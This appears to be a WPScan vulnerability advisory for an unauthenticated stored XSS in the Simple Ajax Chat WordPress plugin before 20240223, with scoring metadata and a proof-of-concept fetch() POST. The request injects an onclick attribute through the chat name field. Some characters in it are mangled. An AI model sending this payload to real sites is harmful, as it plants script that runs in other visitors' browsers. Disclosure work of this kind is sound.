Lucene search

K
wpvulndbFourcadeWPVDB-ID:BF3A31DE-A227-4DB1-BD18-CE6A78DC96FB
HistoryFeb 28, 2024 - 12:00 a.m.

Simple Ajax Chat < 20240223 - Unauthenticated Stored XSS

2024-02-2800:00:00
fourcade
wpscan.com
8
ajax chat
unauthenticated
stored xss
plugin
malicious names
unsanitized reflections
vulnerability

AI Score

6.5

Confidence

High

EPSS

0

Percentile

9.0%

Description The plugin does not prevent visitors from using malicious Names when using the chat, which will be reflected unsanitized to other users.

PoC

await fetch(“http://vulnerable-site.tld/wp-content/plugins/simple-ajax-chat/simple-ajax-chat-core.php?sacSendChat=yes”, { “credentials”: “include”, “headers”: { “User-Agent”: “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0”, “Accept”: “/”, “Accept-Language”: “en-CA,en-US;q=0.7,en;q=0.3”, “Content-Type”: “application/x-www-form-urlencoded”, “Sec-GPC”: “1” }, “body”: “n=%22onclick=%22alert1%22&c;=adasd&u;=https%3A%2F%2F&sac;_nonce=$NONCE&sac;_js_nonce=$NONCE”, “method”: “POST”, “mode”: “cors” });

AI Score

6.5

Confidence

High

EPSS

0

Percentile

9.0%

Related for WPVDB-ID:BF3A31DE-A227-4DB1-BD18-CE6A78DC96FB